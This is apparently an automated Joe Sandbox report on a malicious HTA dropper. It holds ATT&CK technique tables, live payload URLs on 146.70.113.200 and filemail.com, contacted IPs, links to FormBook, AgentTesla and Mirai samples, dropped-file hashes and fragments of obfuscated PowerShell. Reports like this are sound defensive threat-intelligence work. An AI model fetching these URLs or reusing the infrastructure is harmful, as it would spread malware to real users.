Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Command and Scripting Interpreter	111 Scripting	211 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFy	0%	Avira URL Cloud	safe
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c	0%	Avira URL Cloud	safe
https://1016.filemail.com	0%	Avira URL Cloud	safe
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFg	0%	Avira URL Cloud	safe
http://146.70.113.200/231/seethe	0%	Avira URL Cloud	safe
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFQ	0%	Avira URL Cloud	safe
http://146.70.113.200/231/ZAHHRZA.txt	0%	Avira URL Cloud	safe
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF	0%	Avira URL Cloud	safe
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip.1016.filemail.com	142.215.209.77	true	true		unknown
1016.filemail.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://146.70.113.200/231/ZAHHRZA.txt	true	Avira URL Cloud: safe	unknown
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c	true	Avira URL Cloud: safe	unknown
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFQ	powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1354159145.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://146.70.113.200/231/seethe	powershell.exe, 00000003.00000002.1352224226.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.1352224226.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFy	powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1354159145.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1016.filemail.com	powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFg	powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1352224226.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T	powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.215.209.77	ip.1016.filemail.com	Canada		32156	HUMBER-COLLEGECA	true
146.70.113.200	unknown	United Kingdom		2018	TENET-1ZA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566423
Start date and time:	2024-12-02 07:37:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	seemebestthingsgivenmegood.hta
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winHTA@17/16@1/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 42 Number of non-executed functions: 220
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7544 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: seemebestthingsgivenmegood.hta

Simulations

Behavior and APIs

Time	Type	Description
01:37:54	API Interceptor	112x Sleep call for process: powershell.exe modified
01:38:32	API Interceptor	3x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.215.209.77	PI-02911202409#.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse
	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Enquiry.js	Get hash	malicious	AgentTesla	Browse
146.70.113.200	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	146.70.113.200/231/ZAHHRZA.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1016.filemail.com	PI-02911202409#.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.77
	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.77
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.77
	Enquiry.js	Get hash	malicious	AgentTesla	Browse	142.215.209.77
	0028BGL880-2024.PDF.exe	Get hash	malicious	Remcos, DBatLoader	Browse	192.240.97.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TENET-1ZA	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	146.70.113.200
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	196.21.197.1
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	146.141.248.178
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	196.248.39.5
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	196.28.0.175
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	152.112.239.75
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	163.200.191.11
	arm.elf	Get hash	malicious	Mirai	Browse	146.239.92.47
	arm7-20241130-2047.elf	Get hash	malicious	Mirai	Browse	146.141.175.89
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	146.232.14.47
HUMBER-COLLEGECA	PI-02911202409#.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.77
	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.77
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.77
	Enquiry.js	Get hash	malicious	AgentTesla	Browse	142.215.209.77
	https://www.filemail.com/d/dolcahmytquddaz	Get hash	malicious	Unknown	Browse	142.215.209.74
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	142.214.116.218
	geHxbPNEMi.vbs	Get hash	malicious	Unknown	Browse	142.215.209.78
	QUOTATION.xls	Get hash	malicious	HTMLPhisher	Browse	142.215.209.78
	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	142.215.209.78
	segura.vbs	Get hash	malicious	Remcos	Browse	142.215.209.78

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Original CI PL.html	Get hash	malicious	Unknown	Browse	142.215.209.77
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.215.209.77
	tDLozbx48F.exe	Get hash	malicious	Gurcu Stealer	Browse	142.215.209.77
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	142.215.209.77
	5fEYPS3M8Q.exe	Get hash	malicious	XWorm	Browse	142.215.209.77
	1d5sraR1S1.exe	Get hash	malicious	AgentTesla	Browse	142.215.209.77
	file.exe	Get hash	malicious	LummaC Stealer	Browse	142.215.209.77
	back.ps1	Get hash	malicious	Unknown	Browse	142.215.209.77
	og.ps1	Get hash	malicious	Unknown	Browse	142.215.209.77
	bold.ps1	Get hash	malicious	Unknown	Browse	142.215.209.77

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
Category:	dropped
Size (bytes):	154384
Entropy (8bit):	3.8033508297517873
Encrypted:	false
SSDEEP:	3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
MD5:	297E6244E9EDCAEB8B1F6705E40CB51D
SHA1:	230882871D7FF55237292422E02EEF841CF5F21E
SHA-256:	9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
SHA-512:	F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
Malicious:	false
Preview:	...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.328291987572489
Encrypted:	false
SSDEEP:	24:3sYgSKco4KmZjKbmOIKoas4RPT6moUP7mZ9t7J0gt/NKM9r8Hd:fgSU4xympx4RfoUP7mZ9tK8NF9u
MD5:	AA70A72503A63D06A026FFF05A5A7F95
SHA1:	DD78E805A9CE55F7A3BEE821C331EC0B5AEA3FC8
SHA-256:	14C843E73604AECF1C57CF0383AB2EDB7A8C1ED0ED7A132E42FF2824D9EC4221
SHA-512:	D352417C889FBF8B3C7453A1D061712F90380204036BB3EA6318BF186C86C52676A625807EBDCC05026C2A541CEB0398C58D095F831B2DC3D57F6394F3F44CCB
Malicious:	false
Preview:	@...e.................................,..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RESE7FE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 08:28:13 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.965567633540067
Encrypted:	false
SSDEEP:	24:HMe9ERo1ebqHKFwKjmfwI+ycuZhNUPakSloPNnqSqd:31yqqmKjmo1ulSa32qSK
MD5:	4B314446D84506564231A217A89BB653
SHA1:	79314AD6F95B41FD8D507108338AAB9CD8F41B2E
SHA-256:	E6C558D94D1E1E558DC6E856F3D96DA4153CE04444286D0FE8A39706367CA1D3
SHA-512:	7E4F779B194628F874BDC4AA6B2A8C2340738D32A2048497629C470EFD72E408912D00B8A273CF836A59E2FB2D263B5C79EFD1DD4272E0DBA76EB62772CFD092
Malicious:	false
Preview:	L....oMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP...................o.E.....I{...s..........3.......C:\Users\user\AppData\Local\Temp\RESE7FE.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.l.l.3.h.p.d.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rdnpvo.v0l.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5bged2a.yxp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvs4oach.wly.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qidq0t0g.zxw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svm3ycn4.xww.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uks12bjz.ms2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.093949962858528
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+uGak7YnqqluXPN5Dlq5J:+RI+ycuZhNUPakSloPNnqX
MD5:	920A6FBE45A3B9020CEE497BA1AE8E73
SHA1:	13CF15B6B7D75A15D6B807B2FA46C33B163FE81A
SHA-256:	91F6A86406B0DCCBEF81218DFE02DD3B62E043BD45FC8E507CD98C0000D25E3A
SHA-512:	B7F4B8DFB0FDFE28A04702BE904BFA05E8B9DADDE98E935C3993ECCDB93DE0BC8FD1E4C71F5705BC200EDC3F75CF832506ED95BFDE9828F4F7E54B286FEDD7CC
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.l.l.3.h.p.d.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.l.l.3.h.p.d.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
Category:	dropped
Size (bytes):	468
Entropy (8bit):	3.816942936139208
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zu840gElFVMmFnQXReKJ8SRHy4HttmDZf/5IOs1eYy:V/DTLDfu2fUXfHMRIOKeYy
MD5:	8EC70363397A774E14B716C7EF51ABB6
SHA1:	A966DB39ACEC786DE5A04960C81B9133EBE14F3E
SHA-256:	2B3045FEB8ECAC01126519F49D1D27FC6D3CFF70140DA11BCC7CD0334671E5CE
SHA-512:	04064F6B95DC606553C2723A2962BE61819E1D3BBEEC34F99089C28FA0F1CC8D1FAC10D0266BE29899C2AE55026E199500B49E8D1D7FCFF10F9A580DFAC9D916
Malicious:	false
